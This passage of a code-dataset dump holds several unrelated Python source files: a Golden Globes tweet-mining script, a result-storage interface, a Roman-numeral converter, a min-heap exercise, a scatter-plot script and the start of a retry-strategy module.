'goldenglobe']\n\n\ndef get_first_and_last(hosts, index):\n name = hosts[index]\n split_name = name.split(' ')\n if len(split_name) >= 2:\n return name # return name if already two or more parts\n count = 1\n if index < 0:\n limit = len(hosts) + index + 1\n else:\n limit = index + 1\n max_limit = 5 # max number of additional names to check\n while count < min(limit, max_limit):\n next_name = hosts[index-count]\n split_next_name = next_name.split(' ')\n if split_next_name[0] == split_name[0]:\n return next_name\n count += 1\n return name\n\n\ndef find_dressed(dressed, tweet, key_words):\n names = find_names(tweet, key_words)\n if not names:\n return\n for token in tweet:\n word = token.text.lower()\n if word == 'beauty' or word == 'pretty' or word == 'gorgeous' or word == 'best' or word == 'fashionista':\n for person in names:\n dressed['best'].append(person)\n break\n if ((word == 'ugly' or word == 'ew' or word == 'bad' or word == 'terrible' or word == 'worst'\n or word == 'gross' or word == 'awful')):\n for person in names:\n dressed['worst'].append(person)\n break\n\n\ndef find_hosts(unique_hosts, counts):\n hosts = []\n if not unique_hosts:\n return hosts\n first_host = get_first_and_last(unique_hosts, -1) # make sure to find the first and last name\n split_first_host = first_host.split(' ')\n first_host_count = counts[-1]\n hosts.append(first_host)\n # if the second highest name doesn't have the same first name and is within a percentage, add it as well\n count = 1\n limit = 10 # max number of additional potential hosts to check\n similarity_coefficient = 0.6\n while count < min(len(unique_hosts), limit):\n name = get_first_and_last(unique_hosts, -1-count)\n split_name = name.split(' ')\n similarity = counts[-1-count] / first_host_count\n if split_name[0] != split_first_host[0] and similarity > similarity_coefficient:\n hosts.append(name)\n break\n count += 1\n return hosts\n\n\ndef get_hosts(year):\n '''Hosts is a list of one or more strings. Do NOT change the name\n of this function or what it returns.'''\n answer = load_data('answer' + str(year) + '.json')\n hosts = answer['hosts']\n return hosts\n\n\ndef find_awards(unique_awards, counts):\n if len(unique_awards) > 26:\n awards = unique_awards[-26:][::-1]\n else:\n awards = unique_awards[::-1]\n return awards\n\n\ndef get_awards(year):\n '''Awards is a list of strings. 
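For example (sketch), entries look like 'best motion picture - drama' or\n    'cecil b. demille award', matching the hard-coded lists above. 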
Do NOT change the name\n of this function or what it returns.'''\n answer = load_data('answer' + str(year) + '.json')\n awards = answer['awards']\n return awards\n\n\ndef find_nominees(year, unique_nominees, counts, winners):\n nominees = {}\n official_awards = get_awards_by_year(year)\n for award in official_awards:\n nom_list = []\n mentions = counts[award]\n award_noms = unique_nominees[award]\n if len(mentions) > 1:\n if (mentions[-1] / 2) >= mentions[-2]: # and mentions[-1] > 4:\n cutoff = mentions[-2] / 2\n else:\n cutoff = mentions[-1] / 2\n for i in range(1, len(mentions)):\n sim_flag = False\n if mentions[-i] >= cutoff:\n curr_nom = award_noms[-i]\n split_name = curr_nom.split(' ')\n if not award_noms[-i] == winners[award]:\n for nom in nom_list:\n if SequenceMatcher(None, nom, curr_nom).ratio() >= 0.8:\n sim_flag = True\n split = nom.split(' ')\n for word in split:\n for new_word in split_name:\n if SequenceMatcher(None, new_word, word).ratio() >= 0.85:\n sim_flag = True\n if not sim_flag:\n nom_list.append(award_noms[-i])\n else:\n break\n elif award_noms:\n nom_list.append(award_noms[-1])\n nominees[award] = nom_list\n return nominees\n\n\ndef get_nominees(year):\n '''Nominees is dictionary with the hard coded award\n names as keys, and each entry a list of strings. Do NOT change\n the name of this function or what it returns.'''\n answer = load_data('answer' + str(year) + '.json')\n award_data = answer['award_data']\n nominees = {}\n for award in award_data.keys():\n nominees[award] = award_data[award][0]\n return nominees\n\n\ndef nom_filter(tweet, key_words):\n nom_list = []\n for ent in tweet.ents:\n if not ent_filter(ent):\n continue\n ignore_flag = False\n nom = re.sub(r'[^A-Za-z ]+', '', ent.text) # remove any characters that are not alphabetic or a space\n if ((not nom or nom[0] == ' ' or nom[-1] == ' ' or nom[0].islower() or nom.lower() in custom_stop_words\n or nom.strip(' ').lower() in custom_stop_words)):\n continue\n for word in nom.split(' '):\n if word.lower() in custom_stop_words or word.lower() in key_words:\n ignore_flag = True\n if not ignore_flag and not (nom == '' or nom == ' '):\n nom_list.append(nom)\n return nom_list\n\n\ndef find_winners(year, unique_winners):\n official_awards = get_awards_by_year(year)\n winners = {}\n # get winners\n for award in official_awards:\n award_winners = unique_winners[award]\n if not award_winners:\n winners[award] = None\n else:\n winners[award] = award_winners[-1]\n return winners\n\n\ndef get_winner(year):\n '''Winners is a dictionary with the hard coded award\n names as keys, and each entry containing a single string.\n Do NOT change the name of this function or what it returns.'''\n answer = load_data('answer' + str(year) + '.json')\n award_data = answer['award_data']\n winners = {}\n for award in award_data.keys():\n winners[award] = award_data[award][1]\n return winners\n\n\ndef find_presenters(year, unique_presenters, counts):\n official_awards = get_awards_by_year(year)\n presenters = {}\n similarity_coefficient = 0.9\n # get presenters\n for award in official_awards:\n award_presenters = unique_presenters[award]\n if len(award_presenters) == 0:\n presenters[award] = []\n else:\n first_presenter = award_presenters[-1]\n first_presenter_count = counts[award][-1]\n presenters[award] = [first_presenter]\n count = 1\n limit = 2 # set max number of potential presenters\n while count < min(len(award_presenters), limit):\n presenter = award_presenters[-1-count]\n if (counts[award][-1-count] / first_presenter_count) > 
similarity_coefficient:\n presenters[award].append(presenter)\n count += 1\n return presenters\n\n\ndef get_presenters(year):\n '''Presenters is a dictionary with the hard coded award\n names as keys, and each entry a list of strings. Do NOT change the\n name of this function or what it returns.'''\n answer = load_data('answer' + str(year) + '.json')\n award_data = answer['award_data']\n presenters = {}\n for award in award_data.keys():\n presenters[award] = award_data[award][2]\n return presenters\n\n\ndef pre_ceremony():\n '''This function loads/fetches/processes any data your program\n will use, and stores that data in your DB or in a json, csv, or\n plain text file. It is the first thing the TA will run when grading.\n Do NOT change the name of this function or what it returns.'''\n print('Starting pre-ceremony now...')\n tweets = {}\n for year in range(2000, 2020):\n try:\n # print('Checking for ' + str(year) + ' data')\n data = load_data('gg' + str(year) + '.json')\n tweets[year] = extract_text(data)\n # print('Found ' + str(year) + ' data')\n except:\n pass\n # print(str(year) + ' data not found')\n for year in tweets.keys():\n with open('processed_gg' + str(year) + '.json', 'w') as f:\n json.dump(tweets[year], f)\n print('Pre-ceremony complete')\n return\n\n\n# load json file as dictionary, eg. 'gg20XX.json'\ndef load_data(file_name):\n with open(file_name, 'r') as f:\n data = json.load(f)\n return data\n\n\ndef extract_text(tweets):\n tweet_text = []\n filtered_tweets = copy.deepcopy(tweets)\n for tweet in filtered_tweets:\n if tweet['text'][0:2].lower() != 'rt': # exclude retweets\n tweet_text.append(tweet['text'])\n return tweet_text\n\n\n# return True if we want to append token, otherwise False\ndef token_filter(token):\n return not (token.is_punct or token.is_space or token.is_stop or len(token.text) <= 3 or '@' in token.text\n or '#' in token.text or 'http' in token.text)\n\n\n# return True if we want to append entity, otherwise False\ndef ent_filter(ent):\n return not (ent.text.lower() in custom_stop_words or '@' in ent.text or '#' in ent.text or 'http' in ent.text)\n\n\ndef get_awards_by_year(year):\n if year > 2018:\n return OFFICIAL_AWARDS_1819\n return OFFICIAL_AWARDS_1315\n\n\ndef find_award(year, tweet):\n official_awards = get_awards_by_year(year)\n best_match = ''\n best = 0 # must have at least one significant word in common\n official_tokens = tokenizer.pipe(official_awards)\n for award in official_tokens:\n temp = 0\n for award_token in award:\n # if award_token.lower == 'best' or award_token.is_stop: # exclude shared and insignificant words\n # continue\n for tweet_token in tweet:\n if award_token.lower == tweet_token.lower:\n temp += 1\n break\n elif award_token.lower == 'television' and tweet_token.lower == 'tv':\n temp += 1\n break\n elif award_token.lower == 'picture' and (tweet_token.lower == 'film' or tweet_token.lower == 'movie'):\n temp += 1\n break\n if temp > best:\n best = temp\n best_match = award.text\n return best_match\n\n\n# can generalize this function to find names with any number of parts, eg. 
John Doe = 2, A Great Movie = 3\n# then we can use it to find the names of movies as well as people whose names are more than 2 parts\ndef find_names(tweet, key_words):\n text = tweet.text\n pattern = r'([A-Z][a-z]+ [A-Z][a-z]+)' # regex pattern to find capitalized two-part names\n matches = re.findall(pattern, text)\n names = []\n for match in matches:\n if match.lower() in custom_stop_words:\n continue\n split = match.split(' ')\n ignore_flag = False\n for word in split:\n if nlp.vocab[word.lower()].is_stop or word.lower() in key_words: # ignore potential names that share words with the official awards list\n ignore_flag = True\n break\n if not ignore_flag:\n names.append(match)\n return names\n\n\n# serializes answer dict for access in get functions\ndef form_answer(year, hosts, awards, nominees, winners, presenters):\n official_awards = get_awards_by_year(year)\n answer = {}\n answer['hosts'] = hosts\n answer['awards'] = awards\n answer['award_data'] = {}\n for award in official_awards:\n answer['award_data'][award] = [nominees[award], winners[award], presenters[award]]\n with open('answer' + str(year) + '.json', 'w') as f:\n json.dump(answer, f)\n print_answer(year, answer)\n\n\ndef print_answer(year, answer):\n official_awards = get_awards_by_year(year)\n file = open('readableanswer' + str(year) + '.txt', 'w')\n file.write('Hosts: ')\n for name in answer['hosts']:\n file.write(name + '; ')\n file.write('\\n\\n')\n for award in official_awards:\n file.write('Award: ' + award)\n nominees, winner, presenters = answer['award_data'][award]\n file.write('\\nPresenters: ')\n for name in presenters:\n file.write(name + '; ')\n file.write('\\nNominees: ')\n for name in nominees:\n file.write(name + '; ')\n if winner is None:\n winner = 'N/A'\n file.write('\\nWinner: ' + winner + '\\n\\n')\n file.close()\n # print results to console\n print('\\nHost(s):\\n')\n print(answer['hosts'])\n print('\\nAwards:\\n')\n for award in answer['awards']:\n print(award)\n print('\\nAward Data:\\n')\n for award in official_awards:\n print(award)\n nominees, winner, presenters = answer['award_data'][award]\n print('Nominees: ')\n print(nominees)\n print('Winner: ')\n print(winner)\n print('Presenter(s): ')\n print(presenters)\n print('')\n\n\ndef best_and_worst(year, best_dressed, worst_dressed, controversially_dressed):\n file = open('readableanswer' + str(year) + '.txt', 'a')\n file.write('Best Dressed: ' + best_dressed + '\\n')\n file.write('Worst Dressed: ' + worst_dressed + '\\n')\n file.write('Controversially Dressed: ' + controversially_dressed + '\\n')\n file.close()\n # print results to console\n print('Red Carpet:\\n')\n print('Best Dressed: ' + best_dressed)\n print('Worst Dressed: ' + worst_dressed)\n print('Controversially Dressed: ' + controversially_dressed)\n print('')\n\n\n# experimental phrase tree implementation, uses less memory when storing lists of strings with similar substrings\nclass WordNode:\n def __init__(self, word):\n self.word = word\n self.children = {}\n self.count = 0\n\n\ndef add_phrase(node, split_phrase):\n if len(split_phrase) == 0:\n node.count += 1 # iterate count if end of phrase\n return\n next_word = None\n for child_word in node.children.keys(): # if one of the remaining words is a child, continue down that path\n if child_word in split_phrase:\n next_word = child_word\n split_phrase.remove(next_word)\n add_phrase(node.children[next_word], split_phrase) # recurse with the word removed\n return\n if not next_word:\n next_word = split_phrase[0].lower()\n if 
nlp.vocab[next_word].is_stop:\n add_phrase(node, split_phrase[1:]) # recursively continue to add phrase with next word\n elif next_word in node.children.keys():\n add_phrase(node.children[next_word], split_phrase[1:]) # if path exists, recurse that way\n else:\n new_word_node = WordNode(next_word) # otherwise create new node\n node.children[next_word] = new_word_node\n add_phrase(new_word_node, split_phrase[1:]) # continue recursively adding phrase with new node\n\n\ndef get_phrases(node, prepend_str, award_names):\n if not prepend_str:\n new_prepend_str = node.word\n else:\n new_prepend_str = prepend_str + ' ' + node.word # add current node's word to current phrase\n if node.count > 0:\n award_names[new_prepend_str] = node.count # if complete phrase, add to dict\n for child in node.children.keys():\n get_phrases(node.children[child], new_prepend_str, award_names) # recurse on all children\n\n\ndef find_award_names(award_tree, tweet):\n text = tweet.text\n pattern = r'([Bb]est( [A-Za-z]+)+)'\n # aux_pattern = r'(\\-( [A-Za-z]+)+)' # for finding genres, possibly related entities\n matches = re.findall(pattern, text)\n # aux_matches = re.findall(aux_pattern, text)\n # aux_words = []\n # for aux_match in aux_matches:\n # aux_split = aux_match[0][2:].split(' ')\n # for word in aux_split:\n # if word.lower() in award_words: # if auxiliary words are common words in awards, append them\n # aux_words += aux_split\n # break\n for match in matches:\n split = match[0].split(' ')[1:] # + aux_words\n add_phrase(award_tree, split) # add phrase to phrase tree\n\n\ndef main():\n '''This function calls your program. Typing \"python gg_api.py\"\n will run this function. Or, in the interpreter, import gg_api\n and then run gg_api.main(). This is the second thing the TA will\n run when grading. 
Do NOT change the name of this function or what it returns.'''\n # pre_ceremony()\n print('Starting main now...')\n start_time = time.time()\n\n data = None\n data_year = None\n for year in range(2000, 2020):\n try:\n data = load_data('processed_gg' + str(year) + '.json')\n data_year = year\n # print('Using data for ' + str(year))\n break\n except:\n pass\n if not data:\n print('No processed data found, exiting program')\n sys.exit()\n\n potential_hosts = []\n award_tree = WordNode('best')\n award_names = {}\n noms_split = {'misc': []}\n winners_split = {'misc': []}\n presenters_split = {'misc': []}\n unique_noms = {}\n unique_winners = {}\n unique_presenters = {}\n noms_counts = {}\n winners_counts = {}\n presenters_counts = {}\n possible_presenters = {}\n possible_noms = {}\n possible_winners = {}\n dressed = {'best': [], 'worst': []}\n curr_award = 'misc' # take advantage of chronological ordering, keep track of what award is being talked about\n\n key_words = {'host', 'hosts', 'hosting', 'award', 'awards', 'awarding', 'awarded', 'nominate', 'nominates',\n 'nominating', 'nominated', 'nominee', 'win', 'wins', 'won', 'winner', 'present', 'presents',\n 'presenting', 'presented', 'accept', 'accepting', 'speech'} # only used in finding nominees, winners, and presenters!\n official_awards = get_awards_by_year(data_year)\n for award in official_awards:\n noms_split[award] = []\n winners_split[award] = []\n presenters_split[award] = []\n split = award.split(' ')\n for word in split:\n if len(word) > 1 and not nlp.vocab[word].is_stop:\n key_words.add(word) # populate list with significant words in award names\n\n for word in custom_stop_words:\n nlp.vocab[word].is_stop = True # additional custom stop words\n\n num_tweets = len(data) # total number of tweets\n n = 200000 # maximum number of tweets to check\n skip = int(num_tweets / n) # number of tweets to skip per selection\n if skip != 0:\n data = data[0::skip] # select n evenly spaced tweets from data\n tweets = ner.pipe(data, batch_size=50, n_threads=3)\n # check all tweets and extract necessary data in a single loop for better performance\n for tweet in tweets:\n tokens = []\n next_flag = False\n should_flag = False\n for token in tweet:\n t = token.lower\n if t == 'next': # flag tweets about next year\n next_flag = True\n continue\n if t == 'should': # flag opinion tweets\n should_flag = True\n continue\n if not token_filter(token):\n continue\n tokens.append(token.lemma_.lower())\n for index, token in enumerate(tokens): # enumeration can be used to check tokens in close proximity\n # find hosts\n if token == 'host' and not (next_flag and should_flag):\n for ent in tweet.ents: # store entities from spaCy's named entity recognizer\n if ent_filter(ent):\n potential_hosts.append(ent.text.lower())\n # break\n # find awards\n if token == 'best':\n # award_tweets.append(tweet)\n find_award_names(award_tree, tweet) # store potential award names in award name phrase tree\n # for ent in tweet.ents:\n # if len(ent.text) > 4 and ent.text[:4].lower() == 'best':\n # award_names.append(ent.text.lower())\n # break # just for performance while developing\n # find presenters\n if token == 'present':\n # presenter_tweets.append(tweet)\n a = find_award(data_year, tweet)\n if a != '':\n curr_award = a\n presenters_split[a] += find_names(tweet, key_words)\n else:\n presenters_split['misc'] += find_names(tweet, key_words)\n # break\n # find winners\n if ((token == 'win' or token == 'congrats' or token == 'congratulations' or token == 'accept'\n or token == 
'speech')): # or token == 'congratulate', 'receive'\n # winner_tweets.append(tweet)\n a = find_award(data_year, tweet)\n if should_flag:\n if a != '':\n curr_award = a\n noms_split[a] += nom_filter(tweet, key_words)\n else:\n noms_split[curr_award] += nom_filter(tweet, key_words)\n else:\n if a != '':\n curr_award = a\n winners_split[a] += find_names(tweet, key_words)\n else:\n winners_split['misc'] += find_names(tweet, key_words)\n # break\n # find nominees\n if token == 'nominate' or token == 'nominee' or token == 'deserve' or token == 'lose' or token == 'rob':\n # nominee_tweets.append(tweet)\n a = find_award(data_year, tweet)\n if a != '':\n curr_award = a\n noms_split[a] += nom_filter(tweet, key_words)\n else:\n noms_split[curr_award] += nom_filter(tweet, key_words)\n # break\n if token == 'dress' or token == 'beauty' or token == 'pretty' or token == 'ugly' or token == 'fashion':\n find_dressed(dressed, tweet, key_words)\n # break\n if n == 0:\n break\n n -= 1\n\n # prepare potential hosts data\n unique_hosts = sorted(set(potential_hosts), key=potential_hosts.count)\n hosts_counts = [potential_hosts.count(host) for host in unique_hosts]\n # possible_hosts = list(zip(unique_hosts, hosts_counts))\n\n # prepare potential award names data\n award_tree.count = 0 # avoid considering 'best' as the name of an award in itself\n get_phrases(award_tree, '', award_names) # populate award names list with phrases from phrase tree\n unique_award_names = sorted(set(award_names.keys()), key=lambda x: award_names[x])\n awards_counts = [award_names[award_name] for award_name in unique_award_names]\n # possible_award_names = list(zip(unique_award_names, awards_counts))\n\n # prepare best/worst/controversially dressed data\n best_dressed = sorted(set(dressed['best']), key=dressed['best'].count)\n worst_dressed = sorted(set(dressed['worst']), key=dressed['worst'].count)\n controversially_dressed = 'N/A'\n diff = len(best_dressed) + len(worst_dressed)\n if best_dressed and worst_dressed:\n for i in range(1, len(best_dressed)):\n for j in range(1, len(worst_dressed)):\n if best_dressed[-i] == worst_dressed[-j] and diff > abs(i-j):\n diff = abs(i-j)\n controversially_dressed = best_dressed[-i]\n best_dressed = best_dressed[-1]\n worst_dressed = worst_dressed[-1]\n else:\n best_dressed = 'N/A'\n worst_dressed = 'N/A'\n\n # prepare nominee/winner/presenter data for each award\n for award in official_awards:\n unique_noms[award] = sorted(set(noms_split[award]), key=noms_split[award].count)\n unique_winners[award] = sorted(set(winners_split[award]), key=winners_split[award].count)\n presenters_split_set = set(presenters_split[award])\n if unique_winners[award]:\n winner_name = get_first_and_last(unique_winners[award], -1)\n if winner_name in presenters_split_set:\n presenters_split_set.remove(winner_name)\n unique_presenters[award] = sorted(presenters_split_set, key=presenters_split[award].count)\n noms_counts[award] = [noms_split[award].count(possible_nom) for possible_nom in unique_noms[award]]\n winners_counts[award] = [winners_split[award].count(possible_winner)\n for possible_winner in unique_winners[award]]\n presenters_counts[award] = [presenters_split[award].count(possible_pres)\n for possible_pres in unique_presenters[award]]\n # possible_noms[award] = list(zip(unique_noms[award], noms_counts[award]))\n # possible_winners[award] = list(zip(unique_winners[award], winners_counts[award]))\n # possible_presenters[award] = list(zip(unique_presenters[award], presenters_counts[award]))\n\n hosts = 
find_hosts(unique_hosts, hosts_counts)\n awards = find_awards(unique_award_names, awards_counts)\n winners = find_winners(data_year, unique_winners)\n nominees = find_nominees(data_year, unique_noms, noms_counts, winners)\n presenters = find_presenters(data_year, unique_presenters, presenters_counts)\n\n print('Forming answer...')\n form_answer(data_year, hosts, awards, nominees, winners, presenters) # serialize answers for access in get funcs\n best_and_worst(data_year, best_dressed, worst_dressed, controversially_dressed)\n end_time = time.time()\n print('Main complete')\n print('Time: ', str(end_time - start_time))\n return\n\n\nif __name__ == '__main__':\n main()\n\n# unused import statements\n#\n# import pdb\n# import string\n# from pprint import pprint\n#\n# unused functions\n#\n# def parse_text(tweets):\n# spacy_tweets = tokenizer.pipe(tweets)\n# ner = nernlp.pipe(tweets)\n# return spacy_tweets, ner\n#\n# def find_award_alt(tweet):\n# best = 0\n# best_match = ''\n# for award in OFFICIAL_AWARDS:\n# for index, token in enumerate(tweet):\n# if token.text == 'best':\n# if tweet[index] == tweet[-1]:\n# continue\n# if 'dress' in tweet[index+1].text:\n# continue\n# text = tweet[index:(index+4)].text\n# if similar(award, text) > best:\n# best = similar(award, text)\n# best_match = award\n# break\n# if token.text == 'foreign':\n# best_match = 'best foreign language film'\n# break\n# for ent in tweet.ents:\n# if similar(award, ent.text) > best:\n# best = similar(award, ent.text)\n# best_match = award\n# if best == 0:\n# return None\n# return best_match\n#\n# def find_real_names(names_list):\n# ia = IMDb()\n# real_names = {}\n# for name in names_list:\n# if name not in custom_stop_words:\n# if name in real_names:\n# real_names[name] += 1\n# elif ia.search_person(name) != []:\n# real_names[name] = 1\n# return real_names\n#\n# # found on https://stackoverflow.com/questions/17388213/find-the-similarity-metric-between-two-strings\n# def similar(a, b):\n# return SequenceMatcher(None, a, b).ratio()\n","repo_name":"racherson/golden-globe-summary","sub_path":"gg_api.py","file_name":"gg_api.py","file_ext":"py","file_size_in_byte":32619,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22115301601","text":"\n# encoding: utf-8\n\n__author__ = \"Nils Tobias Schmidt\"\n__email__ = \"schmidt89 at informatik.uni-marburg.de\"\n\nfrom androlyze.model.script import ScriptUtil as ScriptUtil\nfrom androlyze.model.script.CustomResultObjInterface import CustomResultObjInterface\n\nclass ResultWritingInterface:\n '''\n Interface for the writing of the analysis results.\n '''\n\n def store_result_for_apk(self, apk, script):\n ''' Store the `result` for the `apk` which has been analyzed with the `script`.\n\n Will overwrite already existing results of the `script` in the storage\n\n If a custom result object is used in `script` and it's not a `ResultObject`,\n str(custom res object) will be used for writing to disk.\n\n\n Parameters\n ----------\n apk: Apk\n script: AndroScript\n\n Raises\n ------\n StorageException\n\n Returns\n -------\n Dependent on the implementation\n '''\n raise NotImplementedError\n\n @staticmethod\n def get_custom_res_obj_representation(script):\n ''' Get the representation of the custom result object.\n This is the data repr. 
that shall be stored '''\n        cres = script.cres\n        if isinstance(cres, CustomResultObjInterface):\n            return cres.get_custom_result_obj_repr()\n        elif ScriptUtil.is_result_object(cres):\n            return cres.write_to_json()\n        return str(cres)","repo_name":"nachtmaar/androlyze","sub_path":"androlyze/storage/ResultWritingInterface.py","file_name":"ResultWritingInterface.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"72"}
{"seq_id":"924896446","text":"class Solution:\n    def intToRoman(self, num: int) -> str:\n        # first attempt: Recursively subtract the largest roman numeral you can from the num\n        # Does it need to be recursive? is it simpler to use a while loop?\n\n        # second attempt: Use a dictionary instead of 2 lists and see size difference\n        # also instead of having if statements for special cases, add those into the\n        # dictionary as their own characters\n\n        # ans = \"\"\n        # values = [1000, 500, 100, 50, 10, 5, 1] # only 7 roman numerals\n        # romanNums = [\"M\", \"D\", \"C\", \"L\", \"X\", \"V\", \"I\"]\n\n        # for i in range(0, len(values)):\n        #     while(num - values[i] >= 0): # loops 7*n = O(7n)\n        #         ans += romanNums[i]\n        #         num -= values[i]\n        #     if(num - values[i] < 0): # check special cases\n        #         if(num == 4):\n        #             ans += \"IV\"\n        #             num -= 4\n        #         elif(num == 9):\n        #             ans += \"IX\"\n        #             num -= 9\n        #         elif(num >= 40 and num < 50):\n        #             ans += \"XL\"\n        #             num -= 40\n        #         elif(num >= 90 and num < 100):\n        #             ans += \"XC\"\n        #             num -= 90\n        #         elif(num >= 400 and num < 500):\n        #             ans += \"CD\"\n        #             num -= 400\n        #         elif(num >= 900 and num < 1000):\n        #             ans += \"CM\"\n        #             num -= 900\n\n        # Second attempt-------------------------------------------------------------\n        # a bit faster and easier to understand than 2 lists\n        # (relies on dicts preserving insertion order, i.e. Python 3.7+)\n        ans = \"\"\n        romanNums = { \n            \"M\" : 1000,\n            \"CM\" : 900,\n            \"D\" : 500,\n            \"CD\" : 400,\n            \"C\" : 100,\n            \"XC\" : 90,\n            \"L\" : 50,\n            \"XL\" : 40,\n            \"X\" : 10,\n            \"IX\" : 9,\n            \"V\" : 5,\n            \"IV\" : 4,\n            \"I\" : 1,\n        }\n\n        for key in romanNums:\n            while(num - romanNums[key] >= 0):\n                ans += key\n                num -= romanNums[key]\n\n        return ans","repo_name":"JeremyTaraba/LeetCode","sub_path":"Medium/Integer_To_Roman.py","file_name":"Integer_To_Roman.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"22115301601","text":"'''\n12.1. Heap and basic operations\n\nTime limit: 3 seconds\nMemory limit: 16.0 MB\nInput: standard input or input.txt\nOutput: standard output or output.txt\nImplement the \"heap\" data structure. Write a program implementing all of the methods listed here. The program reads a sequence of commands and, depending on the command, performs the corresponding operation. After executing each command the program must print one line. The possible commands are:\n\n1. add n Add the number n to the heap (the value n is given after the command). The program must print \"ok\".\n2. min Take the minimum element from the heap. The program must print its value.\n3. size The program must print the number of elements in the heap.\n4. exit The program must print \"bye\" and terminate.\n\nIt is guaranteed that the set of input commands satisfies the following requirements: the maximum number of elements in the heap at any moment does not exceed 100,000, and all \"min\" commands are valid, i.e. when they are executed the heap contains at least one element.\n\nInput description\nHeap-management commands are entered, one per line.\n\nOutput description\nPrint the log of operations on the heap, one message per line.\n\nInput format\nadd 1\nadd 23\nadd -3\nmin\nadd -100\nmin\nexit\n\nOutput format\nok\nok\nok\n-3\nok\n-100\nbye\n'''\n\nclass Heap:\n    def __init__(self):\n        self.heap = list()\n\n    def add(self, elem: int):\n        index = len(self.heap)\n        self.heap.append(elem)\n        self.sift_up(index)\n        return 'ok'\n\n    def sift_up(self, index):\n        if index == 0:\n            return\n        prev = (index - 1) // 2\n        if self.heap[prev] > self.heap[index]:\n            self.heap[prev], self.heap[index] = self.heap[index], self.heap[prev]\n            self.sift_up(prev)\n\n    def get_min(self):\n        return self.heap[0]\n\n    def size(self):\n        return len(self.heap)\n\n\nheap = Heap()\nin_put = ''\nwhile in_put != 'exit':\n    in_put = input()\n    if 'add' in in_put:\n        command, num = in_put.split()\n        num = int(num)\n        print(heap.add(num))\n    elif 'min' in in_put:\n        print(heap.get_min())\n    elif 'size' in in_put:\n        print(heap.size())\nprint('bye')\n","repo_name":"wafflelios/Algorithms_and_complexity_analysis","sub_path":"Куча(Неар)/12.1 Куча и базовые операции.py","file_name":"12.1 Куча и базовые операции.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"18364812134","text":"# -*- coding: utf-8 -*-\n# @Author: Vyn\n# @Date: 2019-03-05 21:35:50\n# @Last Modified by: Vyn\n# @Last Modified time: 2019-03-06 18:43:37\n\n# 1: dataset\n# 2: column1 (2 - 31)\n# 3: column2 (2 - 31)\n\nimport sys\nimport csv\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nCOLUMN_DIAGNOSIS = 1\n\ndef couple(a, b):\n\tCOLUMN_1 = a;\n\tCOLUMN_2 = b;\n\n\tXB = [];\n\tYB = [];\n\n\tXM = [];\n\tYM = [];\n\n\twith open(sys.argv[1], \"rt\") as csvfile:\n\t\tcsvreader = csv.reader(csvfile)\n\t\tfor row in csvreader:\n\t\t\tif row[1] == \"B\":\n\t\t\t\tXB.append(float(row[COLUMN_1]));\n\t\t\t\tYB.append(float(row[COLUMN_2]));\n\t\t\tif row[1] == \"M\":\n\t\t\t\tXM.append(float(row[COLUMN_1]));\n\t\t\t\tYM.append(float(row[COLUMN_2]));\n\n\t#plt.subplot(10, 10, 1);\n\tplt.plot(XB, YB, 'ro', color = \"blue\");\n\tplt.plot(XM, YM, 'ro', color = \"red\");\n\tplt.title(\"Feature \" + str(COLUMN_1) + \" / \" + str(COLUMN_2));\n\tplt.xlabel(\"feature \" + str(COLUMN_1));\n\tplt.ylabel(\"feature \" + str(COLUMN_2));\n\tplt.show()\n\nif len(sys.argv) == 4:\n\tcouple(int(sys.argv[2]), int(sys.argv[3]));\nelif len(sys.argv) == 2:\n\tfor i in range(2, 30): # start at 11\n\t\tfor j in range(2, 30): # start at 2\n\t\t\tcouple(i, j);\nelse:\n\texit();","repo_name":"xesnault/42-Projects","sub_path":"MultilayerPerceptron/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"34060416156","text":"import abc\nimport logging\nimport time\nfrom datetime import datetime\nfrom datetime import timedelta\n\nlog = logging.getLogger(__name__)\n\n\nclass GaveUpError(Exception):\n    \"\"\"Raised by a :class:`Retryer` that has exceeded its maximum number of retries.\"\"\"\n    pass\n\n\nclass 
DelayStrategy(object):\n    \"\"\"Used by a :class:`Retryer` to determine how long to wait after an\n    attempt before the next retry. \"\"\"\n    __metaclass__ = abc.ABCMeta\n\n    @abc.abstractmethod\n    def next_delay(self, attempts):\n        \"\"\"Returns the time to wait before the next attempt.\n\n        :param attempts: The total number of (failed) attempts performed thus far.\n        :type attempts: int\n\n        :return: The delay before the next attempt.\n        :rtype: `timedelta`\n        \"\"\"\n        pass\n\n\nclass FixedDelayStrategy(DelayStrategy):\n    \"\"\"A retry :class:`DelayStrategy` that produces a fixed delay between attempts.\"\"\"\n\n    def __init__(self, delay):\n        \"\"\"\n        :param delay: Attempt delay.\n        :type delay: `timedelta`\n        \"\"\"\n        self.delay = delay\n\n    def next_delay(self, attempts):\n        return self.delay\n\n\nclass ExponentialBackoffDelayStrategy(DelayStrategy):\n    \"\"\"A retry :class:`DelayStrategy` that produces an exponentially longer\n    delay between attempts. The first attempt will be followed\n    by an `initial_delay * 2**0` delay. The following delays will be\n    `initial_delay * 2**1`, `initial_delay * 2**2`, and so on ...\n    \"\"\"\n\n    def __init__(self, initial_delay):\n        \"\"\"\n        :param initial_delay: Initial delay.\n        :type initial_delay: `timedelta`\n        \"\"\"\n        self.initial_delay = initial_delay\n\n    def next_delay(self, attempts):\n        if attempts <= 0:\n            return timedelta(seconds=0)\n        delay_seconds = self.initial_delay.total_seconds() * 2 ** (attempts - 1)\n        return timedelta(seconds=delay_seconds)\n\n\nclass NoDelayStrategy(FixedDelayStrategy):\n    \"\"\"A retry :class:`DelayStrategy` that doesn't introduce any delay between attempts.\"\"\"\n\n    def __init__(self):\n        super(NoDelayStrategy, self).__init__(timedelta(seconds=0))\n\n\nclass ErrorStrategy(object):\n    \"\"\"Used by a :class:`Retryer` to determine which errors are to be\n    suppressed and which errors are to be re-raised and thereby end the (re)trying.\"\"\"\n    __metaclass__ = abc.ABCMeta\n\n    @abc.abstractmethod\n    def should_suppress(self, error):\n        \"\"\"Called after an attempt that raised an exception to determine if\n        that error should be suppressed (continue retrying) or be re-raised (and end the 